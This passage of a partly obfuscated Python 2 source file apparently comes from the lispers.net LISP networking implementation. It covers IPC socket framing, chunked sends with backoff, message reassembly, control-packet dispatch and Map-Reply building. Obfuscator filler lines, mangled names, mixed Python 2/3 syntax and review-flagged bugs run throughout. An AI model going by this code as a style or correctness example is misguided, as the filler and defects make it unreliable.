        sock.bind(sock_path)

    return (sock)
if 39 - 39: OoO0O00 . ooOoO0o
if 41 - 41: Oo0Ooo * I1ii11iIi11i - II111iiii - II111iiii
if 7 - 7: oO0o
if 41 - 41: ooOoO0o
if 93 - 93: Ii1I + I1Ii111 + Ii1I
if 23 - 23: I1IiiI - i1IIi / ooOoO0o
if 4 - 4: IiII . I1ii11iIi11i + iII111i % ooOoO0o
def lisp_open_send_socket(internal_name, afi):
    """Open a datagram socket to send from.

    With an empty *internal_name*, open an unbound UDP socket for the
    given address family (returns None for IPv6 on Raspbian). Otherwise
    bind a Unix-domain socket to the *internal_name* path, removing a
    stale socket file first.
    """
    if (internal_name == ""):
        if (afi == LISP_AFI_IPV4):
            sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

        if (afi == LISP_AFI_IPV6):
            if (lisp_is_raspbian()): return (None)
            sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
    else:
        #
        # Fixed: remove the stale socket file with os.remove() rather
        # than os.system("rm " + name) -- no shell, safe with special
        # characters in the path.
        #
        if (os.path.exists(internal_name)):
            try:
                os.remove(internal_name)
            except OSError:
                pass                  # best effort, as "rm" was
        sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
        sock.bind(internal_name)

    return (sock)
if 41 - 41: I1Ii111 + ooOoO0o / OOooOOo + I11i % Oo0Ooo
if 91 - 91: I1IiiI % I1ii11iIi11i % oO0o / i1IIi * iIii1I11I1II1 + I11i
if 48 - 48: ooOoO0o / I1ii11iIi11i / OoO0O00 / II111iiii * OoOoOO00
if 73 - 73: I11i / I1IiiI - IiII - i1IIi * IiII - OOooOOo
if 39 - 39: I11i . ooOoO0o * II111iiii
if 21 - 21: Ii1I
if 92 - 92: OoO0O00 * I1ii11iIi11i + iIii1I11I1II1
def lisp_close_socket(sock, internal_name):
    """Close *sock* and remove its Unix-domain socket file, if any."""
    sock.close()
    # Fixed: os.remove() instead of os.system("rm " + name) -- no shell
    # involved, so special characters in the path are safe.
    if (os.path.exists(internal_name)):
        try:
            os.remove(internal_name)
        except OSError:
            pass                      # best effort, as "rm" was
    return
if 88 - 88: iIii1I11I1II1 + iIii1I11I1II1 * i11iIiiIii . I1ii11iIi11i % oO0o
if 94 - 94: I1IiiI / I1ii11iIi11i / OOooOOo
if 45 - 45: II111iiii
if 98 - 98: i11iIiiIii + I1ii11iIi11i * OOooOOo / OoOoOO00
if 84 - 84: o0oOOo0O0Ooo
if 40 - 40: OoooooooOO - oO0o / O0 * I1Ii111 . O0 + i11iIiiIii
if 9 - 9: OOooOOo % O0 % O0 / I1ii11iIi11i . II111iiii / II111iiii
if 78 - 78: iIii1I11I1II1 - i1IIi . I11i . o0oOOo0O0Ooo
def lisp_is_running(node):
    """Return True when the named component's socket file exists -- i.e.
    the corresponding lispers.net process is up."""
    return (os.path.exists(node))
if 66 - 66: OOooOOo * Oo0Ooo
if 58 - 58: OOooOOo
if 96 - 96: IiII % OoooooooOO + O0 * II111iiii / OOooOOo . I1Ii111
if 47 - 47: OoO0O00 - Oo0Ooo * OoO0O00 / oO0o
if 13 - 13: ooOoO0o
if 55 - 55: i1IIi . I11i . II111iiii + O0 + ooOoO0o - i1IIi
if 3 - 3: iIii1I11I1II1 / oO0o
if 61 - 61: I1Ii111 / O0 - iII111i
if 44 - 44: i1IIi
def lisp_packet_ipc(packet, source, sport):
    """Frame a received packet for IPC: "packet@<len>@<source>@<sport>@"
    followed by the payload."""
    fields = ["packet", str(len(packet)), source, str(sport), packet]
    return ("@".join(fields))
if 23 - 23: I1ii11iIi11i . OoooooooOO / Ii1I + o0oOOo0O0Ooo
if 89 - 89: OoOoOO00 + Oo0Ooo . OoOoOO00 - II111iiii
if 85 - 85: OoooooooOO * OoooooooOO / Ii1I - II111iiii
if 69 - 69: iII111i * I11i
if 43 - 43: o0oOOo0O0Ooo - IiII * Ii1I . i11iIiiIii / II111iiii
if 61 - 61: OoOoOO00 / I1IiiI . I1ii11iIi11i % OOooOOo
if 70 - 70: OOooOOo * OoOoOO00 / oO0o + Oo0Ooo / O0
if 16 - 16: Oo0Ooo / OoooooooOO / IiII + Oo0Ooo * i11iIiiIii
if 15 - 15: o0oOOo0O0Ooo / i11iIiiIii
def lisp_control_packet_ipc(packet, source, dest, dport):
    """Frame a control packet for IPC: "control-packet@<dest>@<dport>@"
    followed by the payload (*source* is accepted but not encoded)."""
    fields = ["control-packet", dest, str(dport), packet]
    return ("@".join(fields))
if 63 - 63: I1ii11iIi11i - Ii1I + I11i
if 98 - 98: iII111i / IiII * I1IiiI / oO0o - iIii1I11I1II1
if 72 - 72: O0 . OOooOOo
if 99 - 99: i1IIi + iIii1I11I1II1 - ooOoO0o + OoO0O00 + Oo0Ooo . I1ii11iIi11i
if 74 - 74: i1IIi
if 80 - 80: ooOoO0o + I1Ii111 . I1ii11iIi11i % OoooooooOO
if 26 - 26: OoOoOO00 . iII111i * iIii1I11I1II1 / IiII
def lisp_data_packet_ipc(packet, source):
    """Frame a data packet for IPC: "data-packet@<len>@<source>@@" with
    an empty port field, followed by the payload."""
    fields = ["data-packet", str(len(packet)), source, "", packet]
    return ("@".join(fields))
if 69 - 69: OoooooooOO / I11i + Ii1I * II111iiii
if 35 - 35: i11iIiiIii + oO0o
if 85 - 85: OoOoOO00 . O0 % OoooooooOO % oO0o
if 43 - 43: I1IiiI - I11i . I1IiiI / i11iIiiIii % IiII * i11iIiiIii
if 12 - 12: II111iiii - iIii1I11I1II1
if 43 - 43: i11iIiiIii % OoO0O00
if 100 - 100: i1IIi
if 4 - 4: i11iIiiIii - OOooOOo * IiII % OoooooooOO - OoOoOO00
if 81 - 81: Ii1I * ooOoO0o . oO0o . IiII
def lisp_command_ipc(packet, source):
    """Frame a command for IPC: "command@<len>@<source>@@" with an empty
    port field, followed by the command text."""
    fields = ["command", str(len(packet)), source, "", packet]
    return ("@".join(fields))
if 71 - 71: IiII + OoO0O00
if 39 - 39: I1IiiI % IiII / II111iiii / II111iiii
if 95 - 95: II111iiii + i11iIiiIii + o0oOOo0O0Ooo
if 30 - 30: O0 - O0 % iIii1I11I1II1 + iII111i * OoooooooOO
if 1 - 1: O0
if 36 - 36: oO0o . iII111i
if 62 - 62: I11i + iIii1I11I1II1 % I11i * OOooOOo + iIii1I11I1II1 % Ii1I
if 56 - 56: o0oOOo0O0Ooo
if 55 - 55: oO0o - I1Ii111 / ooOoO0o % I1IiiI * OoooooooOO * I1IiiI
def lisp_api_ipc(source, data):
    """Frame an API message for IPC: "api@<len>@<source>@@" with an empty
    port field, followed by the API data."""
    fields = ["api", str(len(data)), source, "", data]
    return ("@".join(fields))
if 88 - 88: Ii1I + O0
if 92 - 92: I1IiiI % iII111i % I11i + OoooooooOO - i11iIiiIii
if 9 - 9: i11iIiiIii - II111iiii / ooOoO0o
if 81 - 81: i11iIiiIii % OoOoOO00 % OoO0O00 * Ii1I
if 85 - 85: OoooooooOO * ooOoO0o
if 23 - 23: OOooOOo / I11i / OoooooooOO - Ii1I / OoO0O00 - OoO0O00
if 60 - 60: OOooOOo . ooOoO0o % i1IIi % Ii1I % ooOoO0o + OoO0O00
if 26 - 26: O0 % o0oOOo0O0Ooo + iII111i * I1ii11iIi11i * I1Ii111
if 4 - 4: OOooOOo * OoooooooOO * i1IIi % I1ii11iIi11i % Oo0Ooo
def lisp_ipc(packet, send_socket, node):
    """Send IPC message *packet* to Unix-socket path *node* via
    *send_socket*, chunking large messages and retrying failed sends
    with exponential backoff.

    Python-2 code (note the "except socket.error , e" syntax). Local
    name key (obfuscation): o00o = max chunk size, i1 = send offset,
    iI1 = bytes remaining, OooO0O0oo = consecutive-failure count,
    o00oO0oo = backoff delay in seconds, OoO00oO0oOoO0 = chunk length,
    o0OOOoOo0oO = current chunk, o0OoO00 = caught socket error.
    """
    if 1 - 1: OoO0O00 / iIii1I11I1II1 % I1ii11iIi11i - o0oOOo0O0Ooo
    if 62 - 62: I1Ii111 % II111iiii
    if 91 - 91: I11i % Ii1I - IiII + iIii1I11I1II1 * iIii1I11I1II1
    if 91 - 91: i11iIiiIii + Ii1I
    # Don't send if the receiver isn't running (its socket file is
    # missing) -- avoids queueing to a dead peer.
    if (lisp_is_running(node) == False):
        lprint("Suppress sending IPC to {}".format(node))
        return
    if 85 - 85: I11i % IiII
    if 68 - 68: Oo0Ooo . I1Ii111 - o0oOOo0O0Ooo * iIii1I11I1II1 - II111iiii % i1IIi
    # Control packets may use a 9000-byte chunk; everything else 1500.
    o00o = 1500 if (packet.find("control-packet") == -1) else 9000
    if 1 - 1: oO0o - ooOoO0o
    i1 = 0
    iI1 = len(packet)
    OooO0O0oo = 0
    o00oO0oo = .001
    while (iI1 > 0):
        OoO00oO0oOoO0 = min(iI1, o00o)
        o0OOOoOo0oO = packet[i1:OoO00oO0oOoO0 + i1]
        if 80 - 80: OoOoOO00
        try:
            send_socket.sendto(o0OOOoOo0oO, node)
            lprint("Send IPC {}-out-of-{} byte to {} succeeded".format(len(o0OOOoOo0oO), len(packet), node))
            if 31 - 31: OOooOOo * ooOoO0o + ooOoO0o / O0 - OOooOOo
            # A successful send resets the failure count and backoff.
            OooO0O0oo = 0
            o00oO0oo = .001
            if 47 - 47: I1Ii111 . OoooooooOO - oO0o - o0oOOo0O0Ooo . I1ii11iIi11i / iIii1I11I1II1
        except socket.error , o0OoO00:
            # Give up after 12 consecutive failures on the same chunk.
            if (OooO0O0oo == 12):
                lprint("Giving up on {}, consider it down".format(node))
                break
            if 20 - 20: i11iIiiIii / OoO0O00 * I1IiiI - I1IiiI * Ii1I
            if 73 - 73: ooOoO0o % I1Ii111
            lprint("Send IPC {}-out-of-{} byte to {} failed: {}".format(len(o0OOOoOo0oO), len(packet), node, o0OoO00))
            if 69 - 69: OoOoOO00 / OOooOOo / I1IiiI
            if 12 - 12: I1ii11iIi11i . iIii1I11I1II1 . II111iiii . OoOoOO00
            # Exponential backoff: sleep, double the delay, retry the
            # same chunk (offset is not advanced on failure).
            OooO0O0oo += 1
            time.sleep(o00oO0oo)
            if 30 - 30: i11iIiiIii / Oo0Ooo / OOooOOo + i11iIiiIii * ooOoO0o
            lprint("Retrying after {} ms ...".format(o00oO0oo * 1000))
            o00oO0oo *= 2
            continue
        if 4 - 4: O0 + I1IiiI + I1Ii111
        if 80 - 80: Ii1I % OoooooooOO . i1IIi - OOooOOo
        i1 += OoO00oO0oOoO0
        iI1 -= OoO00oO0oOoO0
    if 10 - 10: I11i + iII111i % OoO0O00 / OoO0O00
    return
if 91 - 91: ooOoO0o . oO0o
if 66 - 66: II111iiii + OOooOOo + i11iIiiIii / II111iiii
if 37 - 37: I1IiiI + OoO0O00 . OoO0O00 % OoOoOO00 + o0oOOo0O0Ooo
if 81 - 81: i1IIi % iIii1I11I1II1
if 41 - 41: oO0o - iII111i / o0oOOo0O0Ooo . iII111i % Oo0Ooo + OOooOOo
if 82 - 82: ooOoO0o
if 89 - 89: OOooOOo / I1ii11iIi11i . I1IiiI + i11iIiiIii
def lisp_format_packet(packet):
    """
    Return a printable hex dump of 'packet': the hexlified bytes grouped
    into 8-nibble (4-byte) chunks separated by single spaces.
    """
    packet = binascii.hexlify(packet)
    hex_dump = ""
    offset = 0

    #
    # NOTE(review): the limit starts at twice the hexlified length and
    # shrinks by 4 per group, so the loop can run past the end of the
    # string and append extra trailing spaces; slicing beyond the end
    # yields "" so this is harmless. Preserved exactly as the original.
    #
    limit = len(packet) * 2
    while (offset < limit):
        hex_dump += packet[offset:offset + 8] + " "
        offset += 8
        limit -= 4
    return(hex_dump)
if 59 - 59: i11iIiiIii / OoO0O00
if 48 - 48: iIii1I11I1II1
if 19 - 19: oO0o
if 69 - 69: I1ii11iIi11i % iII111i - OoooooooOO % Ii1I * oO0o
if 12 - 12: OoOoOO00 / I1Ii111 . O0 . IiII - OOooOOo - OoO0O00
if 28 - 28: II111iiii . OoOoOO00 - o0oOOo0O0Ooo
if 89 - 89: I1Ii111 * OoooooooOO . OOooOOo . I11i % i11iIiiIii
def lisp_send(lisp_sockets, dest, port, packet):
    """
    Send LISP control packet 'packet' to 'dest' on UDP 'port', picking the
    IPv4 or IPv6 socket from 'lisp_sockets'. RLOC-probe Map-Requests and
    Map-Replies (type nibbles 0x12 and 0x28) are sent with the probe TTL
    and the socket TTL is restored afterwards.

    Fixes: the Python-2-only "except socket.error, e" syntax is replaced
    with the "as" form (valid on Python 2.6+ and required on Python 3),
    and "== None" identity tests use "is None".
    """
    send_socket = lisp_sockets[0] if dest.is_ipv4() else lisp_sockets[1]

    #
    # An IPv4-mapped IPv6 address ("::ffff:a.b.c.d") is really an IPv4
    # destination. An RTR always uses the IPv4 socket for it; if no IPv6
    # socket exists, fall back to the IPv4 socket and strip the prefix so
    # sendto() gets a plain dotted-decimal address.
    #
    address = dest.print_address_no_iid()
    if (address.find("::ffff:") != -1 and address.count(".") == 3):
        if (lisp_i_am_rtr): send_socket = lisp_sockets[0]
        if (send_socket is None):
            send_socket = lisp_sockets[0]
            address = address.split("::ffff:")[-1]

    lprint("{} {} bytes {} {}, packet: {}".format(bold("Send", False),
        len(packet), bold("to " + address, False), port,
        lisp_format_packet(packet)))

    #
    # RLOC-probes go out with TTL 255 so the receiver can validate an
    # on-link sender. Only raise the TTL when the first byte says this is
    # a Map-Request (0x12) or Map-Reply (0x28) probe.
    #
    adjust_ttl = (LISP_RLOC_PROBE_TTL == 255)
    if (adjust_ttl):
        lisp_type = struct.unpack("B", packet[0])[0]
        adjust_ttl = (lisp_type in [0x12, 0x28])
        if (adjust_ttl): lisp_set_ttl(send_socket, LISP_RLOC_PROBE_TTL)

    try:
        send_socket.sendto(packet, (address, port))
    except socket.error as e:
        lprint("socket.sendto() failed: {}".format(e))

    #
    # Restore the default TTL if we raised it for an RLOC-probe.
    #
    if (adjust_ttl): lisp_set_ttl(send_socket, 64)
    return
if 19 - 19: iIii1I11I1II1 / I1ii11iIi11i + O0
if 12 - 12: I11i . OOooOOo + o0oOOo0O0Ooo . OoO0O00 + o0oOOo0O0Ooo
if 56 - 56: i1IIi / i1IIi . OoO0O00 % i1IIi - OoOoOO00 % OOooOOo
if 66 - 66: i11iIiiIii * IiII % IiII . I1IiiI / ooOoO0o
if 50 - 50: IiII . iII111i / o0oOOo0O0Ooo % OoOoOO00 * IiII % I11i
if 15 - 15: Ii1I
if 29 - 29: I11i / I1IiiI / OoooooooOO . OoOoOO00 / I11i . I1Ii111
if 69 - 69: O0 * OoOoOO00 + o0oOOo0O0Ooo + I1IiiI % iII111i . OoooooooOO
def lisp_receive_segments(lisp_socket, packet, source, total_length):
    """
    Read the remaining segments of a segmented IPC message from
    'lisp_socket' until 'total_length' bytes of 'packet' are assembled.
    Returns [True, packet] on success, [False, None] on a socket error,
    or [False, new-message] if a fresh "packet@..." message interrupts
    the reassembly.
    """
    expected = total_length - len(packet)
    if (expected == 0): return([True, packet])

    lprint("Received {}-out-of-{} byte segment from {}".format(len(packet),
        total_length, source))

    remaining = expected
    while (remaining > 0):
        try: segment = lisp_socket.recvfrom(9000)
        except: return([False, None])
        segment = segment[0]

        #
        # A segment starting with "packet@" is the beginning of a brand
        # new message; abandon the one being reassembled.
        #
        if (segment.find("packet@") == 0):
            fields = segment.split("@")
            # NOTE(review): lprint is given extra positional args here —
            # looks like a missing .format(); confirm against lprint's
            # signature. Preserved as-is.
            lprint("Received new message ({}-out-of-{}) while receiving " + "fragments, old message discarded", len(segment),
                fields[1] if len(fields) > 2 else "?")
            return([False, segment])

        remaining -= len(segment)
        packet += segment

        lprint("Received {}-out-of-{} byte segment from {}".format(len(segment), total_length, source))
    return([True, packet])
if 98 - 98: I1Ii111 + o0oOOo0O0Ooo
if 73 - 73: I1ii11iIi11i / I1Ii111 + i11iIiiIii + OoO0O00 . ooOoO0o
if 54 - 54: I1ii11iIi11i + IiII - oO0o + Oo0Ooo / IiII % Oo0Ooo
if 2 - 2: OOooOOo / I11i * I11i + I11i / O0 - OOooOOo
if 29 - 29: OoOoOO00 + i11iIiiIii % OoO0O00 - OoooooooOO
if 68 - 68: iII111i / OOooOOo
if 28 - 28: II111iiii
if 49 - 49: I1ii11iIi11i
def lisp_bit_stuff(payload):
    """
    Rejoin the list of message segments in 'payload' with the 0x40 ('@')
    delimiter that splitting removed, without a trailing delimiter.
    """
    lprint("Bit-stuffing, found {} segments".format(len(payload)))
    return("\x40".join(payload))
if 33 - 33: iIii1I11I1II1
if 72 - 72: I1ii11iIi11i * i11iIiiIii
if 12 - 12: O0 - iIii1I11I1II1 % Oo0Ooo / O0 - IiII
if 55 - 55: OOooOOo . Oo0Ooo * OoOoOO00 / OoooooooOO * i11iIiiIii + oO0o
if 45 - 45: Ii1I
if 8 - 8: oO0o + OOooOOo
if 37 - 37: IiII - OoOoOO00 + oO0o - Oo0Ooo + IiII
if 33 - 33: Oo0Ooo % oO0o - I1IiiI + Oo0Ooo
if 90 - 90: I1ii11iIi11i * I1Ii111 - iIii1I11I1II1 % IiII * I1Ii111 . I1Ii111
if 90 - 90: o0oOOo0O0Ooo - O0 % O0 - oO0o . OoooooooOO
if 30 - 30: I11i + O0 / Ii1I / OoOoOO00 - oO0o + II111iiii
if 21 - 21: iIii1I11I1II1 % OoooooooOO * OOooOOo % i1IIi
if 73 - 73: OoooooooOO
if 100 - 100: I11i / i1IIi / i1IIi % Ii1I - II111iiii . OoooooooOO
if 72 - 72: Oo0Ooo * OoooooooOO % I1IiiI + I11i - II111iiii
if 82 - 82: iIii1I11I1II1 / i1IIi * I1IiiI . i11iIiiIii
if 56 - 56: Ii1I * I1IiiI / ooOoO0o * II111iiii
if 51 - 51: i1IIi . oO0o % OOooOOo
if 90 - 90: OoooooooOO + iII111i / iIii1I11I1II1
if 12 - 12: OoooooooOO
def lisp_receive(lisp_socket, internal):
    """
    Receive one message from 'lisp_socket' and return a 4-tuple list
    [opcode, source, port, packet]. When 'internal' is False the socket
    carries raw LISP packets and opcode is always "packet". When True it
    carries IPC messages of the form "opcode@total-length@source@port@
    payload", possibly segmented; segments are reassembled here. Returns
    ["", "", "", ""] on a socket error.
    """
    while (True):
        try: received = lisp_socket.recvfrom(9000)
        except: return(["", "", "", ""])

        #
        # External socket: return the raw packet. Data-plane packets are
        # only logged (truncated) when data-plane logging is on.
        #
        if (internal == False):
            packet = received[0]
            source = lisp_convert_6to4(received[1][0])
            port = received[1][1]

            if (port == LISP_DATA_PORT):
                do_log = lisp_data_plane_logging
                packet_str = lisp_format_packet(packet[0:60]) + " ..."
            else:
                do_log = True
                packet_str = lisp_format_packet(packet)

            if (do_log):
                lprint("{} {} bytes {} {}, packet: {}".format(bold("Receive",
                    False), len(packet), bold("from " + source, False), port,
                    packet_str))
            return(["packet", source, port, packet])

        #
        # Internal IPC message. Parse the "@"-separated header and
        # reassemble segmented payloads.
        #
        assembled = False
        message = received[0]
        discard = False

        while (assembled == False):
            message = message.split("@")

            if (len(message) < 4):
                # NOTE(review): lprint is given an extra positional arg
                # here — looks like a missing .format(); confirm against
                # lprint's signature. Preserved as-is.
                lprint("Possible fragment (length {}), from old message, " + "discarding", len(message[0]))
                discard = True
                break

            opcode = message[0]
            try:
                total_length = int(message[1])
            except:
                error_str = bold("Internal packet reassembly error", False)
                lprint("{}: {}".format(error_str, received))
                discard = True
                break

            source = message[2]
            port = message[3]

            #
            # More than 5 fields means the payload itself contained "@"
            # bytes; re-stitch them.
            #
            if (len(message) > 5):
                packet = lisp_bit_stuff(message[4::])
            else:
                packet = message[4]

            assembled, packet = lisp_receive_segments(lisp_socket, packet,
                source, total_length)
            if (packet == None): return(["", "", "", ""])

            #
            # Reassembly was interrupted by a new message; start parsing
            # it from the top.
            #
            if (assembled == False):
                message = packet
                continue

            if (port == ""): port = "no-port"

            if (opcode == "command" and lisp_i_am_core == False):
                brace = packet.find(" {")
                command_str = packet if brace == -1 else packet[:brace]
                command_str = ": '" + command_str + "'"
            else:
                command_str = ""

            lprint("{} {} bytes {} {}, {}{}".format(bold("Receive", False),
                len(packet), bold("from " + source, False), port, opcode,
                command_str if (opcode in ["command", "api"]) else ": ... " if (opcode == "data-packet") else ": " + lisp_format_packet(packet)))

        if (discard): continue
        return([opcode, source, port, packet])
if 73 - 73: I1Ii111 * OoO0O00 / OoOoOO00 . II111iiii
if 87 - 87: OoO0O00 + Oo0Ooo + O0 % OoooooooOO - iIii1I11I1II1
if 100 - 100: Oo0Ooo + IiII
if 81 - 81: iIii1I11I1II1 + iIii1I11I1II1
if 19 - 19: ooOoO0o + i1IIi / Oo0Ooo * II111iiii * I1Ii111 / ooOoO0o
if 23 - 23: I1Ii111
if 76 - 76: Ii1I + Ii1I / i1IIi % o0oOOo0O0Ooo . iIii1I11I1II1 . OoOoOO00
if 75 - 75: I11i . Ii1I / I1ii11iIi11i
def lisp_parse_packet(lisp_sockets, packet, source, udp_sport, ttl=-1):
    """
    Demultiplex a received LISP control message on its header type and
    dispatch it to the matching processing function. Returns the
    "RTR-list changed" flag, which is only set by Info-Reply processing.
    """
    rtr_list_changed = False

    header = lisp_control_header()
    if (header.decode(packet) == None):
        lprint("Could not decode control header")
        return(rtr_list_changed)

    #
    # 'source' arrives either as an internal "lisp-xxx" process name or as
    # an address string; convert address strings to a lisp_address.
    #
    source_name = source
    if (source.find("lisp") == -1):
        addr = lisp_address(LISP_AFI_NONE, "", 0, 0)
        addr.string_to_afi(source)
        addr.store_address(source)
        source = addr

    if (header.type == LISP_MAP_REQUEST):
        lisp_process_map_request(lisp_sockets, packet, None, 0, source,
            udp_sport, False, ttl)

    elif (header.type == LISP_MAP_REPLY):
        lisp_process_map_reply(lisp_sockets, packet, source, ttl)

    elif (header.type == LISP_MAP_REGISTER):
        lisp_process_map_register(lisp_sockets, packet, source, udp_sport)

    elif (header.type == LISP_MAP_NOTIFY):
        if (source_name == "lisp-etr"):
            lisp_process_multicast_map_notify(packet, source)
        else:
            if (lisp_is_running("lisp-rtr")):
                lisp_process_multicast_map_notify(packet, source)
            lisp_process_map_notify(lisp_sockets, packet, source)

    elif (header.type == LISP_MAP_NOTIFY_ACK):
        lisp_process_map_notify_ack(packet, source)

    elif (header.type == LISP_MAP_REFERRAL):
        lisp_process_map_referral(lisp_sockets, packet, source)

    elif (header.type == LISP_NAT_INFO and header.is_info_reply()):
        unused_h, unused_p, rtr_list_changed = lisp_process_info_reply(source, packet, True)

    elif (header.type == LISP_NAT_INFO and header.is_info_reply() == False):
        addr_str = source.print_address_no_iid()
        lisp_process_info_request(lisp_sockets, packet, addr_str, udp_sport,
            None)

    elif (header.type == LISP_ECM):
        lisp_process_ecm(lisp_sockets, packet, source, udp_sport)

    else:
        lprint("Invalid LISP control packet type {}".format(header.type))

    return(rtr_list_changed)
if 29 - 29: I1IiiI - I11i
if 42 - 42: Oo0Ooo - O0 . OoOoOO00
if 4 - 4: IiII
if 2 - 2: iII111i
if 47 - 47: i1IIi % I11i
if 17 - 17: OoOoOO00 - iII111i % I11i / o0oOOo0O0Ooo / II111iiii
if 22 - 22: Oo0Ooo + I1ii11iIi11i % i11iIiiIii . OoO0O00 - I11i % I11i
def lisp_process_rloc_probe_request(lisp_sockets, map_request, source, port,
    ttl):
    """
    Answer an RLOC-probe Map-Request with a Map-Reply when this process
    is an ETR or an RTR; otherwise log and ignore it.
    """
    probe = bold("RLOC-probe", False)

    if (lisp_i_am_etr):
        lprint("Received {} Map-Request, send RLOC-probe Map-Reply".format(probe))
        lisp_etr_process_map_request(lisp_sockets, map_request, source, port,
            ttl)
        return

    if (lisp_i_am_rtr):
        lprint("Received {} Map-Request, send RLOC-probe Map-Reply".format(probe))
        lisp_rtr_process_map_request(lisp_sockets, map_request, source, port,
            ttl)
        return

    lprint("Ignoring received {} Map-Request, not an ETR or RTR".format(probe))
    return
if 34 - 34: O0 * o0oOOo0O0Ooo / IiII
if 75 - 75: I1Ii111 - i1IIi - OoO0O00
if 25 - 25: iII111i . o0oOOo0O0Ooo
if 62 - 62: I11i + i1IIi . I1ii11iIi11i - I1ii11iIi11i
if 68 - 68: ooOoO0o % OoooooooOO
def lisp_process_smr(map_request):
    """
    Log receipt of a Solicit-Map-Request-based Map-Request. No further
    processing is done here.
    """
    lprint("Received SMR-based Map-Request")
    return
if 94 - 94: Oo0Ooo * o0oOOo0O0Ooo
if 60 - 60: iII111i . OOooOOo
if 39 - 39: O0 - i11iIiiIii - I1IiiI / Oo0Ooo - i11iIiiIii
if 30 - 30: OoO0O00 / OoOoOO00 + I1ii11iIi11i % IiII - OoO0O00
if 19 - 19: I1IiiI
def lisp_process_smr_invoked_request(map_request):
    """
    Log receipt of an SMR-invoked Map-Request. No further processing is
    done here.
    """
    lprint("Received SMR-invoked Map-Request")
    return
if 99 - 99: OOooOOo - OOooOOo
if 98 - 98: o0oOOo0O0Ooo + O0 * oO0o - i11iIiiIii
if 83 - 83: o0oOOo0O0Ooo
if 23 - 23: o0oOOo0O0Ooo . I11i
if 67 - 67: iII111i
if 52 - 52: IiII . OoooooooOO
if 34 - 34: o0oOOo0O0Ooo / IiII . OoooooooOO . Oo0Ooo / ooOoO0o + O0
def lisp_build_map_reply(eid, group, rloc_set, nonce, action, ttl, rloc_probe,
    keys, enc, auth, mr_ttl=-1):
    """
    Encode and return a Map-Reply packet carrying one EID-record for
    (eid, group) and one RLOC-record per entry of 'rloc_set'. RLOCs that
    are local to this system get the local/probe bits and security keys;
    a priority-254 local RLOC on an RTR is named "RTR".
    """
    map_reply = lisp_map_reply()
    map_reply.rloc_probe = rloc_probe
    map_reply.echo_nonce_capable = enc
    map_reply.hop_count = 0 if (mr_ttl == -1) else mr_ttl
    map_reply.record_count = 1
    map_reply.nonce = nonce
    packet = map_reply.encode()
    map_reply.print_map_reply()

    eid_record = lisp_eid_record()
    eid_record.rloc_count = len(rloc_set)
    eid_record.authoritative = auth
    eid_record.record_ttl = ttl
    eid_record.action = action
    eid_record.eid = eid
    eid_record.group = group

    packet += eid_record.encode()
    eid_record.print_record(" ", False)

    local_addresses = lisp_get_all_addresses() + lisp_get_all_translated_rlocs()

    for rloc_entry in rloc_set:
        rloc_record = lisp_rloc_record()
        addr_str = rloc_entry.rloc.print_address_no_iid()
        if (addr_str in local_addresses):
            rloc_record.local_bit = True
            rloc_record.probe_bit = rloc_probe
            rloc_record.keys = keys
            if (rloc_entry.priority == 254 and lisp_i_am_rtr):
                rloc_record.rloc_name = "RTR"

        rloc_record.store_rloc_entry(rloc_entry)
        rloc_record.reach_bit = True
        rloc_record.print_record(" ")
        packet += rloc_record.encode()

    return(packet)
if 12 - 12: oO0o - I1ii11iIi11i
if 69 - 69: iII111i * IiII * oO0o % OoO0O00 - o0oOOo0O0Ooo
if 97 - 97: O0 + i11iIiiIii . i1IIi
if 43 - 43: II111iiii + OOooOOo . i11iIiiIii - II111iiii
if 80 - 80: o0oOOo0O0Ooo . oO0o . I1Ii111
if 26 - 26: i1IIi - I1IiiI + IiII / OoO0O00 . I1ii11iIi11i
if 82 - 82: I1Ii111 % iII111i . OoOoOO00 % OoO0O00 + I1ii11iIi11i
def lisp_build_map_referral(eid, group, ddt_entry, action, ttl, nonce):
    """
    Encode and return a Map-Referral packet for (eid, group) or for the
    supplied DDT entry, with one RLOC-record per delegation-set member.
    A NULL action is refined from the first delegation entry (node vs
    map-server referral).
    """
    map_referral = lisp_map_referral()
    map_referral.record_count = 1
    map_referral.nonce = nonce
    packet = map_referral.encode()
    map_referral.print_map_referral()

    eid_record = lisp_eid_record()

    delegation_count = 0
    if (ddt_entry == None):
        eid_record.eid = eid
        eid_record.group = group
    else:
        delegation_count = len(ddt_entry.delegation_set)
        eid_record.eid = ddt_entry.eid
        eid_record.group = ddt_entry.group
        ddt_entry.map_referrals_sent += 1

    eid_record.rloc_count = delegation_count
    eid_record.authoritative = True

    #
    # Refine a NULL action by examining the first delegation entry.
    #
    incomplete = False
    if (action == LISP_DDT_ACTION_NULL):
        if (delegation_count == 0):
            action = LISP_DDT_ACTION_NODE_REFERRAL
        else:
            ds_entry = ddt_entry.delegation_set[0]
            if (ds_entry.is_ddt_child()):
                action = LISP_DDT_ACTION_NODE_REFERRAL
            if (ds_entry.is_ms_child()):
                action = LISP_DDT_ACTION_MS_REFERRAL

    if (action == LISP_DDT_ACTION_NOT_AUTH): incomplete = True
    if (action in (LISP_DDT_ACTION_MS_REFERRAL, LISP_DDT_ACTION_MS_ACK)):
        # NOTE(review): ds_entry is only bound when the NULL-action branch
        # above ran with a non-empty delegation-set; a caller-supplied
        # MS_REFERRAL/MS_ACK with no delegations would raise NameError
        # here (same as the original) — confirm callers always pass a
        # populated ddt_entry in that case.
        incomplete = (lisp_i_am_ms and ds_entry.is_ms_peer() == False)

    eid_record.action = action
    eid_record.ddt_incomplete = incomplete
    eid_record.record_ttl = ttl

    packet += eid_record.encode()
    eid_record.print_record(" ", True)

    if (delegation_count == 0): return(packet)

    for ds_entry in ddt_entry.delegation_set:
        rloc_record = lisp_rloc_record()
        rloc_record.rloc = ds_entry.delegate_address
        rloc_record.priority = ds_entry.priority
        rloc_record.weight = ds_entry.weight
        rloc_record.mpriority = 255
        rloc_record.mweight = 0
        rloc_record.reach_bit = True
        packet += rloc_record.encode()
        rloc_record.print_record(" ")

    return(packet)
if 13 - 13: o0oOOo0O0Ooo % ooOoO0o
if 15 - 15: iII111i * I1IiiI . iIii1I11I1II1 % I1IiiI / O0
if 47 - 47: OoooooooOO - i11iIiiIii . I1IiiI / i1IIi
if 74 - 74: OoooooooOO * ooOoO0o
if 45 - 45: Oo0Ooo + iIii1I11I1II1 . o0oOOo0O0Ooo
if 50 - 50: o0oOOo0O0Ooo % O0
if 67 - 67: OoOoOO00
def lisp_etr_process_map_request(lisp_sockets, map_request, source, sport,
    ttl):
